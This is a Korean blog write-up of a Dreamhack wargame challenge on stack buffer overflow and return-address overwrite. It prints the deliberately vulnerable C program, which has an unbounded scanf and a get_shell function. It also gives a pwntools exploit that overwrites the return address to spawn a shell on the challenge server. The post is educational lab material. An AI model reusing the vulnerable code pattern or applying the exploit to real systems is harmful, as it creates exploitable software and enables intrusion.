Return Address Overwrite

🌇│System_Study/📕│Dreamhack_Hacking

Return Address Overwrite

Jastes 2022. 4. 25. 19:48

문제풀이

너무 지쳐서.. 문제 풀이는 하나만 할까요?

get_shell 함수를 활용

// Name: rao.c
// Compile: gcc -o rao rao.c -fno-stack-protector -no-pie
 
#include <stdio.h>
#include <unistd.h>
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};
 
  execve(cmd, args, NULL);
}
 
int main() {
  char buf[0x28];
 
  init();
 
  printf("Input: ");
  scanf("%s", buf);
 
  return 0;
}

위 코드가 문제에서 제공되는 코드인데 확인해 보시면

get_shell이라는 함수가 친히 써주세요 하고 execve로 실행을 시켜주시네요
참고로 execve는 cmd창이라고 생각하시면 되실 거 같네요

gcc -o rao rao.c -fno-stack-protector -no-pie

위처럼 하셔서 실행 파일로 만드시고 로컬로 처음에 실행을 해봅시다.

저 문제에서 취약한 코드가 scanf로써 그 이유는

Memory Corruption: Stack Buffer Overflow

스택 버퍼 오버플로우(Stack Buffer Overflow) 세계 최초의 웜이라고 불리는 모리스 윔도 이 공격을 통해 전파됨 보안 공부를 모르는 개발자도 알만큼 유명하고 역사가 오래된 취약점입니다. 이렇게

dystopia050119.tistory.com

위 사이트를 참고하시고, buf가 0x28(40 byte)로 확인하실 수 있으나,
인자를 확인을 안했기에 BOF를 시키는 문제이죠 RET를 get_shell 함수로 하자고요 ㅎ

분석하시면 lea로 반환하는 main+45인 0x402014를 확인하면 '%s'로 확인 가능하죠
그리고 바로 scanf를 호출하기에 또한 위에 main+4에 rsp를 0x30으로 이전 C코드를 보면
0x28인데 추가되었죠 아마 null를 넣어서 끝단을 확인하기 위해서입니다. (문자열이니까 ㅎ)
이거 모르시면 저처럼 삽질 진짜 많이 할걸요 ㅠ

그럼 확인을 해 적어보면 scanf("%s", 0x30); 이겠죠??
그리고 get_shell의 주소를 알아보면 0x401199로 로컬 주소에 코드를 확인할 수 있습니다.

참고로 BOF를 발생해야하기에 입력을 할 때에는 A*0x30정도는 해야겠죠
자, 그럼 pwntools로 코드를 짜서 확인해보면..

from pwn import *
 
#p = process('./rao') # 로컬에서..
p = remote('host1.dreamhack.games', '10464') # 원격(WarGame)
context.arch = 'amd64'
context.log_level = 'debug'
 
shellcode = b'A'*0x30
shellcode += b'B'*0x08 
# shellcode += b'\99\x11\x40\x00\x00\x00\x00\x00 # 로컬
shellcode += b'\xaa\x06\x40\x00\x00\x00\x00\x00' # 원격
 
#p.sendafter('Input: ', shellcode)
p.recvuntil('Input: ') 
p.sendline(shellcode) 
p.interactive()

로 주석처러된대로 사용하시고 분석해보시면 pwntools의 사용법을 아시면 딱히
할 말이 없네요 모르시겠다면 ...

Tool: pwntools

pwntools의 간단 설명 탄생 배경과 설치 방법 지난 시간에 파이썬과 파이프(|)를 통해 간단한 스택 오버플로우 익스플로잇을 했죠 파이썬으로 페이로드를 생성하고, 파이프를 통해 이를 프로그램

dystopia050119.tistory.com

확인 하시면 되겠죠.. 그럼 local과 remote를 각각 결과를 확인해보시면..

확인을 위해 debug를 했는데 결과화면은.. 뭐 자유이긴해요 이상 끝!

아 그리고 다른 방법으로는 위 링크에서 상세하게 또 기제하시더라고요
문제 풀이는 아니지만 딱히 큰 차이는 없을 거예요

[Pwnable 기초] Buffer Overflow취약점과 쉘코드

간단한 예시를 통해 버퍼오버플로우에 대해서 알아보겠습니다. 소스코드 다운로드 : wget https://raw.githubusercontent.com/ICEB3AR/2020_Whois_Pwnable/main/week1/bof_poc.c 컴파일 : gcc -fno-stack-protec..

dev.exd0tpy.xyz

참고 자료

Return Address Overwrite

Description Exploit Tech: Return Address Overwrite에서 실습하는 문제입니다.

dreamhack.io

Memory Corruption: Stack Buffer Overflow

dystopia050119.tistory.com

[Pwnable 기초] Buffer Overflow취약점과 쉘코드

dev.exd0tpy.xyz

참고 이미지

Return Address Overwrite

Description Exploit Tech: Return Address Overwrite에서 실습하는 문제입니다.

dreamhack.io

저작자표시 비영리 변경금지